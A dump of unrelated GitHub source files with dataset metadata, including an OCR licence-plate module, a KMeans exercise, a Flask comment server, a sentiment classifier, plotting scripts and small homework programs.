request.ids[2]\n\n box = [int(coord) for coord in box]\n\n image = Image.fromarray(image_array)\n cropped_image = image.crop(box)\n cropped_image_path = f'model_2_cache/image_{v_id}_{f_id}_{d_id}.jpg'\n cropped_image.save(cropped_image_path)\n\n # The languages supported by PaddleOCR can be switched via the lang parameter,\n # e.g. `ch`, `en`, `fr`, `german`, `korean`, `japan`\n # NOTE: this call only works if the paddleocr import commented out at the top of this module is restored\n ocr = PaddleOCR(use_angle_cls=True, lang=\"ch\") # need to run only once to download and load model into memory\n\n result = ocr.ocr(cropped_image_path, cls=True)\n car_number = ''\n scores = []\n score = 0\n label = None\n for idx in range(len(result)):\n res = result[idx]\n for line in res:\n print(line)\n car_number += line[1][0]\n scores.append(line[1][1])\n\n if len(scores) != 0:\n score = sum(scores) / len(scores)\n\n label = f\"{car_number}: {100 * score:.0f}%\"\n\n request_copy = request.copy()\n request_copy.label = label\n\n self.draw_message_list.put(request_copy) \n\n # print(f\"car_number: {car_number}\")\n # print(f\"score: {score}\")\n # print(f\"label: {label}\")\n\n os.remove(cropped_image_path)\n\n del image, cropped_image, ocr, result, car_number, scores, score, label, request_copy\n\n return cropped_image_path\n\n def process_image_1(self, request):\n image_array, box = request.data, request.box\n image = Image.fromarray(image_array)\n box = int(box[0]), int(box[1]), int(box[2]), int(box[3])\n cropped_image = image.crop(box)\n\n inputs = self.processor(images=cropped_image, return_tensors=\"pt\")\n inputs = {key: val.to(self.device) for key, val in inputs.items()} # move input data to GPU\n\n with torch.no_grad(): # execute model inference, make sure we do not compute gradients\n outputs = self.model(**inputs)\n\n logits = outputs.logits\n predicted_class_idx = logits.argmax(-1).item()\n predicted_class = self.model.config.id2label[predicted_class_idx]\n\n # Calculate score\n score = torch.softmax(logits, dim=-1)[0][predicted_class_idx].item() \n\n # import request\n # self.draw_message_list.append(Request(...))\n label = f\"{predicted_class}: {100 * score:.0f}%\"\n \n request_copy = request.copy()\n request_copy.label = label\n\n self.draw_message_list.put(request_copy)\n\n del image, cropped_image, inputs, outputs, logits, predicted_class_idx, predicted_class, score, label\n\n return\n \n def process_image(self, request):\n image_array, box, v_id, f_id, d_id = request.data, request.box, request.ids[0], request.ids[1], request.ids[2]\n\n box = [int(coord) for coord in box]\n\n image = Image.fromarray(image_array)\n cropped_image = image.crop(box)\n cropped_image_path = f'model_2_cache/image_{v_id}_{f_id}_{d_id}.jpg'\n cropped_image.save(cropped_image_path)\n\n # reader = easyocr.Reader(['ch_sim', 'en'], gpu=True) # need to run only once to load model into memory\n\n with torch.no_grad():\n result = self.reader.readtext(cropped_image_path)\n\n car_number = ''\n scores = []\n score = 0\n label = None\n for idx in range(len(result)):\n res = result[idx]\n # if res[2] < 0.5:\n # continue\n car_number += res[1]\n scores.append(res[2])\n\n if len(scores) != 0:\n score = sum(scores) / len(scores)\n\n label = f\"{car_number}: {100 * score:.0f}%\"\n\n # print(f\"car_number: {car_number}\")\n # print(f\"score: {score}\")\n # # print(f\"scores: {scores}\")\n # print(f\"label: {label}\")\n\n request_copy = request.copy()\n request_copy.label = label\n\n self.draw_message_list.put(request_copy) \n\n os.remove(cropped_image_path)\n\n del image, cropped_image, result, car_number, scores, score, label\n\n 
return\n","repo_name":"lifang535/traffic_monitoring_1","sub_path":"modules/model_2.py","file_name":"model_2.py","file_ext":"py","file_size_in_byte":9182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"25060263717","text":"#Name:Aastha Giri\n#Student ID:0957366\n#Due Date: October 20th, 2019\n#MSITM 6341\n\nmenu_items = {\n\n 'Bacon Guacomole': 9.00,\n\n 'Baja Fish Tacos': 11.00,\n\n 'Seafood Enchiladas': 20.00,\n\n 'Grilled Tilapia': 24.00,\n\n 'Dumplings': 7.00,\n\n 'Cajetas' : 15.99\n\n}\n\nordered_items = {\n\n 'Bacon Guacomole',\n\n 'Nachos',\n\n 'Dumplings'\n\n}\n\n \n\ntotal=0\n\nfor item in ordered_items:\n\n if item in menu_items:\n\n print('{} : ${}'.format(item,menu_items[item]))\n\n total += menu_items[item]\n\n else:\n\n print(\"We do not have {}\".format(item))\n\nprint('---------------------')\n\nprint('Order Total : ${}'.format(total))","repo_name":"aastha123210/python","sub_path":"ASSIGNMENT/homework_assignment_6/resturant_order.py","file_name":"resturant_order.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18039056894","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# Kmeans.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: mli +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/12/08 17:04:24 by mli #+# #+# #\n# Updated: 2022/03/14 01:01:57 by mli ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport sys\nimport re # Regex\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass KmeansClustering:\n def __init__(self, max_iter=20, ncentroid=4):\n self.ncentroid = ncentroid # number of centroids\n self.max_iter = max_iter # number of max iterations to update the centroids\n self.centroids = [] # values of the centroids\n\n def fit(self, X: np.ndarray) -> None:\n \"\"\"\n Run the K-means clustering algorithm.\n For the location of the initial centroids, random pick ncentroids from the dataset.\n Args:\n X: has to be an numpy.ndarray, a matrice of dimension m * n.\n Returns:\n None.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n self.kmeans = KMeans(init='random',\n n_clusters=self.ncentroid,\n n_init=self.max_iter)\n self.kmeans.fit(X)\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Predict from wich cluster each datapoint belongs to.\n Args:\n X: has to be an numpy.ndarray, a matrice of dimension m * n.\n Returns:\n The prediction as a numpy.ndarray, a vector of dimension m * 1.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n self.cluster_labels = self.kmeans.predict(X)\n self.centroids = self.kmeans.cluster_centers_\n return self.centroids\n\n def fig_3D(self, X: np.ndarray) -> None:\n fig = plt.figure()\n ax = Axes3D(fig, auto_add_to_figure=False)\n fig.add_axes(ax)\n\n cluster_labels = self.cluster_labels\n cluster_centers = self.centroids\n\n ax.set_xlabel(\"Height\")\n ax.set_ylabel(\"Weight\")\n ax.set_zlabel(\"Bone Density\")\n\n colorstr = [\"red\", \"blue\", \"green\", \"purple\"]\n for i in range(self.ncentroid):\n mask = cluster_labels == i\n center = cluster_centers[i]\n color = colorstr[i] if (i < len(colorstr)) else None\n\n print(f'{sum(mask)} individuals for {color} centroid ({i}) with coordinates {center}')\n\n ax.scatter(X[mask, 0], 
X[mask, 1], X[mask, 2], color=color)\n ax.scatter(center[0], center[1], center[2], color=color,\n marker=\"o\", s=150, label=\"centroids\")\n plt.show()\n\nARGS_NAME = ['filepath', 'ncentroid', 'max_iter']\n\ndef parsing() -> list or None:\n if (len(sys.argv) != 4):\n return None\n args_regex = [\n rf\"^{ARGS_NAME[0]}=(.+\\.csv)$\",\n rf\"^{ARGS_NAME[1]}=(\\d+)$\",\n rf\"^{ARGS_NAME[2]}=(\\d+)$\",\n ]\n res = []\n\n for i, regex in enumerate(args_regex):\n search_obj = re.search(args_regex[i], sys.argv[i + 1])\n if (search_obj is None):\n return None\n res.append(search_obj.group(1))\n return res\n\ndef print_usage():\n print(f\"\"\"USAGE:\n python {sys.argv[0]} %s=PATH %s=NB %s=NB\nEXAMPLE:\n python {sys.argv[0]} %s=../resources/solar_system_census.csv %s=4 %s=30\n \"\"\" %(*ARGS_NAME, *ARGS_NAME))\n\ndef main():\n ARGV = parsing()\n if ARGV is None:\n print_usage()\n return\n try:\n data = np.genfromtxt(ARGV[0], delimiter=\",\", skip_header=1)\n except Exception as e:\n print(e)\n return\n\n X = data[:, 1:] # Delete index\n ncentroid = int(ARGV[1])\n max_iter = int(ARGV[2])\n\n kms = KmeansClustering(max_iter=max_iter ,ncentroid=ncentroid)\n kms.fit(X)\n kms.predict(X)\n kms.fig_3D(X)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mli42/python_bootcamp","sub_path":"day03/ex04/Kmeans.py","file_name":"Kmeans.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"25143583615","text":"import numpy as np \nimport pandas as pd \nimport os\ndataset = pd.read_csv('C:/Users/Tarun Methwani/Restaurant_Reviews.tsv', delimiter = '\\t', quoting = 3)\n#cleaning the text\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nimport nltk\nnltk.download('stopwords')\ncorpus = []\nfor i in range(0,1000):\n review = re.sub('[^a-zA-Z]', ' ', dataset['Review'][i])\n review = review.lower()\n review = review.split()\n ps = PorterStemmer()\n review = [ps.stem(word) for word in review if not word in set(stopwords.words('english'))]\n review = ' '.join(review)\n corpus.append(review)\n#CountVectorizer which converts the words in the dataset into 0 and 1\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics import accuracy_score\ncv = CountVectorizer(max_features = 1500)\n\nX = cv.fit_transform(corpus).todense()\ny = dataset.iloc[:,1].values\n#splitting the dataset into the training set and testset\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X , y, test_size = 0.20, random_state = 0)\nfrom sklearn.naive_bayes import GaussianNB\nclassifier = GaussianNB()\nclassifier.fit(X_train, y_train)\ny_pred = classifier.predict(X_test)\nAccuracy_Score = accuracy_score(y_test, y_pred)\n\nfeedback = \"\"\n\nnewReview = \"\"\n\nnewReview = \"worst\"\ndef predict(new_review): \n\n new_review = re.sub(\"[^a-zA-Z]\", \" \", new_review) \n\n new_review = new_review.lower().split()\n\n new_review = [ps.stem(word) for word in new_review if word not in set(stopwords.words(\"english\"))] \n\n new_review = \" \".join(new_review) \n\n new_review = [new_review] \n\n new_review = cv.transform(new_review).toarray() \n\n if classifier.predict(new_review)[0] == 1:\n\n return \"Positive\" \n\n else: \n\n return \"Negative\"\n\n \n\nfeedback = predict(newReview)\n\nprint(\"This review is: \", feedback) \nprint(\"Accuracy Score is :\", 
Accuracy_Score)","repo_name":"Tarun-Methwani/Restaurant-review-webapp","sub_path":"data/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26187688454","text":"from keras import Model, layers\nfrom customs.customblocks import ResidualBlock, STEMBlock, FFNBlock, MBConvBlock, MSHABlock, OutputBlock\n\nclass CoAtNet(Model):\n def __init__(self, \n num_classes, \n num_blocks=[2, 3, 5, 2],\n out_channels=[96, 192, 384, 768],\n expansion_rate=4, \n se_ratio=0.25,\n sthotastic_depth_rate=0,\n drop_connect_rate=0,\n drop_rate=0,\n block_types=[\"convulution\",\"convulution\",\"transformer\",\"transformer\"],\n strides=[2,2,2,2],\n head_dimension=32,\n stem_filters=64,\n stem_strides=2,\n activation='gelu',\n classifier_activation = 'softmax',\n use_dw_strides=True\n ):\n \n super().__init__()\n \n assert len(num_blocks) == len(out_channels) == len(block_types) == len(strides) \n \n self.stem_block = STEMBlock(stem_filters, activation=activation, strides=stem_strides)\n \n global_block_id = 0\n self.blocks = []\n total_blocks = sum(num_blocks)\n for stack_id, (num_block, out_channel, block_type) in enumerate(zip(num_blocks, out_channels, block_types)):\n stack_stride = strides[stack_id]\n is_conv_block = True if block_type[0].lower() == \"c\" else False\n if is_conv_block: stack_se_ratio = se_ratio[stack_id] if isinstance(se_ratio, list) else se_ratio\n for block_id in range(num_block):\n block_stride = stack_stride if block_id == 0 else 1\n block_conv_short_cut = True if block_id == 0 else False\n if is_conv_block: block_se_ratio = stack_se_ratio[block_id] if isinstance(stack_se_ratio, list) else stack_se_ratio\n block_drop_rate = drop_connect_rate * global_block_id / total_blocks\n global_block_id += 1\n\n if is_conv_block:\n blocks = (MBConvBlock(\n expansion_rate, out_channel, block_stride, block_se_ratio, use_dw_strides, activation=activation\n ),)\n else:\n blocks = (\n MSHABlock(\n out_channel, block_stride, head_dimension\n ),\n FFNBlock(\n expansion_rate, activation=activation\n )\n )\n \n for block in blocks: \n self.blocks.append(ResidualBlock(\n block, out_channel, block_stride, False if isinstance(block, FFNBlock) else block_conv_short_cut, \n block_drop_rate, sthotastic_depth_rate\n ))\n\n self.classification_output_block = OutputBlock(num_classes, drop_rate, classifier_activation)\n\n def call(self, inputs):\n x = self.stem_block(inputs)\n\n for block in self.blocks:\n x = block(x)\n\n return self.classification_output_block(x)\n\n\nfrom tensorflow_addons.optimizers import AdamW\nfrom keras import losses, metrics\nfrom keras_tuner import HyperModel, HyperParameters\nfrom functools import reduce\n\nclass CoAtNetHyperModel(HyperModel):\n def __init__(self, num_classes):\n super().__init__()\n \n self.num_classes = num_classes\n\n def build(self, hp :HyperParameters):\n # conv_num_blocks = hp.Int(\"conv_num_blocks\", 1, 2, 1)\n # transformer_num_blocks = hp.Int(\"conv_num_blocks\", 1, 2, 1)\n \n # strides = []\n # num_blocks = []\n # block_types = []\n\n # for num in range(conv_num_blocks):\n # num_blocks.append(hp.Int(f\"conv{num}_block_num\", 1, 2, 1) if num == 0 else hp.Int(f\"conv{num}_block_num\", num_blocks[-1]+1, 6, 1))\n # strides.append(2)\n # block_types.append('C')\n \n # for num in range(transformer_num_blocks):\n # num_blocks.append(hp.Int(f\"transformer{num}_block_num\", 1, 2, 1)) if num == 0 else num_blocks.insert(len(num_blocks)-1, 
hp.Int(f\"transformer{num}_block_num\", num_blocks[-1]+1, 7, 1))\n # strides.append(2)\n # block_types.append('T')\n\n\n # out_channels = [hp.Int(f\"conv{0}_block_out_channel\", 16, 96, 16)]\n # for _ in range(3):\n # out_channels.append(out_channels[-1] * 2)\n \n # print(num_blocks, out_channels, block_types, strides)\n model = CoAtNet(num_classes=self.num_classes, \n expansion_rate=3,\n se_ratio=0, \n # drop_connect_rate=hp.Float(\"drop_connect_rate\", 0, 0.99, 0.05), \n # drop_rate=hp.Float(\"drop_rate\", 0, 0.99, 0.05),\n num_blocks=[2, 7, 14, 2], \n # out_channels=[64, 128, 256, 512], \n # block_types=block_types, \n # strides=strides, \n stem_strides=1, \n # head_dimension=hp.Int(\"head_dimension\", 16, out_channels[1], 16), \n stem_filters=48, \n )\n \n model.compile(\n optimizer=AdamW(\n learning_rate= 0.0010478, #0.0010478, manuel1e-4\n weight_decay= 0.00024111430262138014),\n loss=losses.CategoricalCrossentropy(), #from_logits, label_smoothing\n metrics=[\n metrics.CategoricalAccuracy(name=\"accuracy\"),\n metrics.TopKCategoricalAccuracy(5, name=\"top-5-accuracy\"),\n ])\n \n return model\n \n def fit(self, hp, model, *args, **kwargs):\n batch_size=80\n return model.fit(\n *args,\n batch_size=batch_size,\n **kwargs,\n )","repo_name":"Keremm1/CoAtNet","sub_path":"attention_models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71595351402","text":"import turtle\n\n\ndef make_polygon(tur, nsides):\n if tur is None or nsides < 3:\n raise ValueError()\n turn_angle = 360/nsides\n for i in range(0,nsides):\n tur.left(turn_angle)\n tur.forward(100)\n\n\nt = turtle.Turtle()\n\n## Equilateral Triangle\n# sides = 3\n\n## Square\n# sides = 4\n\n## Hexagon\n# sides = 6\n\n## Octagon\nsides = 8\n\nmake_polygon(t,sides)\n\nturtle.mainloop()\n","repo_name":"FelipeCoimbra/CES-22-exerc","sub_path":"1bim/week1/exerc3_6.py","file_name":"exerc3_6.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32095514868","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 1 17:54:36 2020\r\n\r\n@author: lara-\r\n\"\"\"\r\n\r\n#Exercise 2\r\nimport keyword\r\ndef postal_code_validator(postal):\r\n if len(postal) == 8:\r\n i=0\r\n control = 0\r\n while (i < len(postal)):\r\n if i < 4:\r\n if postal[i].isnumeric() == False:\r\n #print(\"a\")\r\n #print(postal[i])\r\n #print(postal[i].isnumeric())\r\n print(\"Postal Code must have a hyphen separating the number in the fifth position\") \r\n print(\"The first four elements in postal code must be digits.\")\r\n print(\"The last 3 elements in postal code must be digits.\")\r\n control = 1\r\n break\r\n \r\n elif i == 4:\r\n if postal[i] != \"-\":\r\n #print(\"b\")\r\n print(\"Postal Code must have a hyphen separating the number in the fifth position\") \r\n print(\"The first four elements in postal code must be digits.\")\r\n print(\"The last 3 elements in postal code must be digits.\")\r\n control = 1\r\n break\r\n else:\r\n if postal[i].isnumeric() == False:\r\n #print(\"c\")\r\n print(\"Postal Code must have a hyphen separating the number in the fifth position\") \r\n print(\"The first four elements in postal code must be digits.\")\r\n print(\"The last 3 elements in postal code must be digits.\")\r\n control = 1\r\n break\r\n i += 1 \r\n if control == 0:\r\n print(\"Postal Code\", postal, \"is ok\")\r\n \r\n 
else:\r\n print(\"Postal Code length is wrong.\") \r\n \r\n \r\n\r\nzip_code = input(\"Postal Code: \")\r\npostal_code_validator(zip_code)","repo_name":"PP144gh/physics_code","sub_path":"python_ObjectOriented_exam/Group1_ex2.py","file_name":"Group1_ex2.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16426547155","text":"from flask import Flask, redirect, url_for, request\r\nfrom flask_cors import CORS,cross_origin\r\nimport sqlite3\r\napp = Flask(__name__)\r\n\r\n\r\ndef ins(time, content, ep, aid, source):\r\n conn = sqlite3.connect('danmu.db')\r\n c = conn.cursor()\r\n c.execute(\"INSERT INTO danmu (TIME,CONTENT,EP,SOURCE,AID) \\\r\n VALUES ({},'{}',{},{},{})\".format(time, content, ep, source, aid))\r\n conn.commit()\r\n c.close()\r\n\r\ndef get(ep,aid,source):\r\n conn = sqlite3.connect('danmu.db')\r\n c = conn.cursor()\r\n cursor = c.execute(\"SELECT time, content, SOURCE from danmu where aid={} and ep={} and source={}\".format(aid,ep,source))\r\n result = [{'time':i[0], 'content':i[1]} for i in cursor]\r\n cursor = c.execute(\"select source, count(*) from danmu where aid={} and ep={} group by source\".format(aid,ep))\r\n r2 = [{'source':i[0], 'counts':i[1]} for i in cursor]\r\n c.close()\r\n return result,r2\r\n\r\n\r\n@app.route('/')\r\n@cross_origin()\r\ndef hello():\r\n return 'Welcome to My Watchlist!'\r\n\r\n\r\n@app.route(\"/getdanmu\")\r\n@cross_origin()\r\ndef getdanmu():\r\n aid = request.args.get('aid')\r\n ep = request.args.get('ep')\r\n source = request.args.get(\"source\")\r\n data,meta = get(ep,aid,source)\r\n return {\"status\":0, \"data\": data, \"meta_info\":meta}\r\n\r\n@app.route(\"/senddanmu\", methods=['GET','POST'])\r\n@cross_origin()\r\ndef senddanmu():\r\n time = request.args.get('time')\r\n content = request.args.get('content')\r\n ep = request.args.get('ep')\r\n aid = request.args.get('aid')\r\n source = request.args.get('source')\r\n # print(time,content)\r\n # time = request.args.get(\"time\")\r\n # content = request.args.get(\"content\")\r\n ins(time,content,ep,aid,source)\r\n return {\"status\":0}\r\n\r\n\r\napp.run(host='0.0.0.0',port=5000, debug=True)\r\n","repo_name":"innnky/fengche-danmu","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"24947364420","text":"import pymorphy2\nimport random\nimport os\n\ndef randomPhrase(nounList, adjList, count=1):\n # Load morph analyzer\n mp = pymorphy2.MorphAnalyzer()\n phrases = []\n\n for cnt in range(0, count):\n # Found random adj and noun from lists\n randNoun = random.choice(nounList)\n randAdj = random.choice(adjList)\n\n # Collect number and gender for inflect phrase\n for i in mp.parse(randNoun):\n if i.tag.POS == \"NOUN\" and i.tag.case == \"nomn\":\n # Unchangeable word\n if (\"Fixd\" in i.tag) == True:\n number = \"fixd\"\n # Only plural number\n elif (\"Pltm\" in i.tag) == True:\n number = \"plur\"\n # Only single number\n elif (\"Sgtm\" in i.tag) == True:\n number = \"sing\"\n # Randomize noun number\n else:\n number = random.choice((\"sing\", \"plur\"))\n\n # Change only gender on adj\n if number == \"sing\" or number == \"fixd\":\n gender = i.tag.gender\n if gender == None: gender = \"masc\"\n inflectVal = {gender}\n break\n # Change only number on noun and adj\n else:\n inflectVal = {number}\n # Change number of noun\n randNoun = 
i.inflect(inflectVal).word\n break\n\n # Inflect adj\n for i in mp.parse(randAdj):\n if i.tag.POS == \"ADJF\" and i.tag.case == \"nomn\":\n # Change number or gender of adj\n randAdj = i.inflect(inflectVal).word\n\n phrases.append(\"{} {}\".format(randAdj, randNoun))\n\n return phrases\n\nif __name__ == '__main__':\n # Script directory\n main_dir = os.path.split(os.path.abspath(__file__))[0]\n\n # Load nouns to list\n with open(os.path.join(main_dir, 'vocab/noun'), 'r', encoding='utf-8') as f:\n nouns = f.read().splitlines()\n\n # Load adjectives to list\n with open(os.path.join(main_dir, 'vocab/adj'), 'r', encoding='utf-8') as f:\n adjectives = f.read().splitlines()\n\n phrase = randomPhrase(nouns, adjectives, 10)\n print(phrase)","repo_name":"dAN0n/RandomPhrasesRu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23995198481","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n# set directory\r\nCFD100 = pd.ExcelFile(\"C:/users/arashjkh/desktop/ENGR491/SoftwareExercises/se2/Simulation100/Python/Cp_100.xlsx\")\r\nxp100 = CFD100.parse('xp')\r\nCFD1000 = pd.ExcelFile(\"C:/users/arashjkh/desktop/ENGR491/SoftwareExercises/se2/Simulation100/Python/Cp_1000.xlsx\")\r\nxp1000 = CFD1000.parse('xp')\r\n#FC = pd.ExcelFile(\"C:/users/arashjkh/desktop/ENGR491/SoftwareExercises/se2/FC.xlsx\")\r\n#FC = FC.parse('FC')\r\n#print(xp)\r\n\r\n\r\n# set plot\r\n#plt.plot(xp['x_0.02'], xp['p_0.02_2'], label='ss_lc=ps_lc=0.02; edge_lc=2 // cells=699')\r\n#plt.plot(xp['x_0.01'], xp['p_0.01_1'], label='ss_lc=ps_lc=0.01; edge_lc=1 // cells=2522')\r\n#plt.plot(xp['x_0.008'], xp['p_0.008_0.8'], label='ss_lc=ps_lc=0.008; edge_lc=0.8 // cells=3513')\r\n#plt.plot(xp['x_0.007'], xp['p_0.007_0.7'], label='ss_lc=ps_lc=0.007; edge_lc=0.7 // cells=4628')\r\n#plt.plot(xp['x_0.006'], xp['p_0.006_0.6'], label='ss_lc=ps_lc=0.006; edge_lc=0.6 // cells=5983')\r\n#plt.plot(xp['x_0.005'], xp['p_0.005_0.5'], label='ss_lc=ps_lc=0.005; edge_lc=0.5 // cells=7685')\r\n#plt.plot(xp['x_0.005'], xp['p_0.005_0.4'], label='ss_lc=ps_lc=0.005; edge_lc=0.4 // cells=9733')\r\n#plt.plot(xp100['x_0.004'], xp100['p_0.004_0.4'], label='ss_lc=ps_lc=0.004; edge_lc=0.4 // cells=11406')\r\n#plt.plot(xp['x_0.003'], xp['p_0.003_0.4'], label='ss_lc=ps_lc=0.003; edge_lc=0.4 // cells=14467')\r\n#plt.plot(xp100['x_0.003'], xp100['p_0.003_0.3'], label='ss_lc=ps_lc=0.003; edge_lc=0.3 // cells=22871')\r\nplt.plot(xp100['x_0.002'], xp100['p_0.002_0.3'], color='r', label='Re = 100 // cells=30841')\r\nplt.plot(xp1000['x_0.003'], xp1000['p_0.003_0.3'], color='b', label='Re = 1000 // cells = 22871')\r\n\r\n\r\n\r\n# set label\r\nplt.xlabel('x/c')\r\nplt.ylabel('pressure [Pa]')\r\nplt.title('Pressure Distribution along the Suction and Pressure Surfaces')\r\n#plt.title('Pressure Distribution along the Suction and Pressure Surfaces for Re=1000')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n'''\r\n\r\n#plt.plot(xp100['time'], xp100['p_100'], color='b', label='Re = 100')\r\nplt.plot(xp1000['time'], xp1000['p_1000'], color='b', label='Re = 1000')\r\n#plt.axvline(x=12.5, color='r', linestyle='--', label='t = 12.5secs')\r\nplt.axvline(x=11, linestyle='--', color='r', label='t = 11secs')\r\n\r\n\r\n# set label\r\nplt.xlabel('time[s]')\r\nplt.ylabel('pressure[Pa]')\r\nplt.title('Variation of pressure with respect to time on the selected point')\r\nplt.legend()\r\nplt.show()\r\n\r\n'''\r\n'''\r\n\r\n# set 
plot\r\nplt.plot(FC['time'], FC['Cd_100'], label='Cd @ Re=100')\r\nplt.plot(FC['time'], FC['Cd_1000'], label='Cd @ Re=1000')\r\nplt.plot(FC['time'], FC['Cl_100'], label='Cl @ Re=100')\r\nplt.plot(FC['time'], FC['Cl_1000'], label='Cl @ Re=1000')\r\n\r\n\r\n# set label\r\nplt.xlabel('time [secs]')\r\nplt.ylabel('Cd and Cl')\r\n#plt.title('Pressure Distribution along the Suction and Pressure Surfaces for Re=100')\r\n#plt.title('Pressure Distribution along the Suction and Pressure Surfaces for Re=1000')\r\nplt.legend()\r\nplt.show()\r\n'''","repo_name":"arashjkh/Computational-Fluid-Dynamics-UBC-course","sub_path":"OpenFOAM-projects/Flow-across-NACA5012/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71957154284","text":"import os\nimport logging\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nlogger = logging.getLogger(__name__)\n\noptions = Options()\nexecutable_path = os.getenv(\"EXECUTABLE_PATH\")\nassert executable_path is not None, \"EXECUTABLE_PATH environment variable must be set\"\nlogger.info(f\"EXECUTABLE_PATH is {executable_path}\")\noptions.binary_location = executable_path\noptions.add_argument(\"whitelisted-ips=''\")\noptions.add_argument(\"disable-xss-auditor\")\noptions.add_argument(\"disable-web-security\")\noptions.add_argument(\"allow-running-insecure-content\")\noptions.add_argument(\"no-sandbox\")\noptions.add_argument(\"disable-setuid-sandbox\")\noptions.add_argument(\"disable-popup-blocking\")\noptions.add_argument(\"allow-elevated-browser\")\noptions.add_argument(\"verbose\")\n\n\ndef wait_for_spinner_visible(driver) -> None:\n \"\"\"Wait for spinner to become visible. 
This should take ~1 second.\"\"\"\n spinner: tuple = (By.CSS_SELECTOR, \"svg[class*=spin]\")\n WebDriverWait(driver, 5).until(EC.visibility_of_element_located(spinner))\n\n\nwith webdriver.Chrome(options=options) as driver:\n wait_for_spinner_visible(driver)\n driver.save_screenshot(\"screenshot.png\")\n","repo_name":"y3rsh/ot-app-actions","sub_path":"selenium_basic.py","file_name":"selenium_basic.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11986930875","text":"from django.conf.urls import url\nfrom django.utils.translation import ugettext_lazy as _\n\nimport reply.views\n\n\napp_name = 'reply'\nurlpatterns = [\n url(_(r'^post/$'),\n reply.views.ReplyPostView.as_view(),\n name='replyPost'),\n url(_(r'^list/(?P<content_id>\\\\d+)/(?P<page>\\\\d+)/$'), # placeholder group names; the originals were stripped during extraction\n reply.views.ReplyListView.as_view(),\n name='replyList'),\n]\n","repo_name":"LunchWith/app1","sub_path":"src/reply/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2378164724","text":"import matplotlib.pyplot as plt\nimport matplotlib.pylab as pylab\n\nparams = {\n 'axes.labelsize': '35',\n 'xtick.labelsize': '27',\n 'ytick.labelsize': '27',\n 'lines.linewidth': 2,\n 'legend.fontsize': '27',\n 'figure.figsize': '12, 9' # set figure size\n}\npylab.rcParams.update(params) # set figure parameter\n# line_styles=['ro-','b^-','gs-','ro--','b^--','gs--'] #set line style\n\n# We give the coordinate data directly to give an example.\nx1 = [-20, -15, -10, -5, 0, 0, 5, 10, 15, 20]\ny1 = [0, 0.04, 0.1, 0.21, 0.39, 0.74, 0.78, 0.80, 0.82, 0.85]\ny2 = [0, 0.014, 0.03, 0.16, 0.37, 0.78, 0.81, 0.83, 0.86, 0.92]\ny3 = [0, 0.001, 0.02, 0.14, 0.34, 0.77, 0.82, 0.85, 0.90, 0.96]\ny4 = [0, 0, 0.02, 0.12, 0.32, 0.77, 0.83, 0.87, 0.93, 0.98]\ny5 = [0, 0, 0.02, 0.11, 0.32, 0.77, 0.82, 0.90, 0.95, 1]\n\n# set the legend and marker sizes\nplt.plot(x1, y1, 'bo-', label='m=2, p=10%', markersize=20) # in 'bo-', b is blue, o is O marker, - is solid line and so on\nplt.plot(x1, y2, 'gv-', label='m=4, p=10%', markersize=15)\nplt.plot(x1, y3, 'ys-', label='m=6, p=10%', markersize=10)\nplt.plot(x1, y4, 'ch-', label='m=8, p=10%', markersize=5)\nplt.plot(x1, y5, 'mD-', label='m=10, p=10%', markersize=3)\n\n# fig1 = plt.figure(1)\n# axes = plt.subplot(111) # numRows, numCols, plotNum\naxes = plt.gca() # get current axes\naxes.set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]) # add the y-axis ticks; this is done separately\naxes.grid(True) # add the 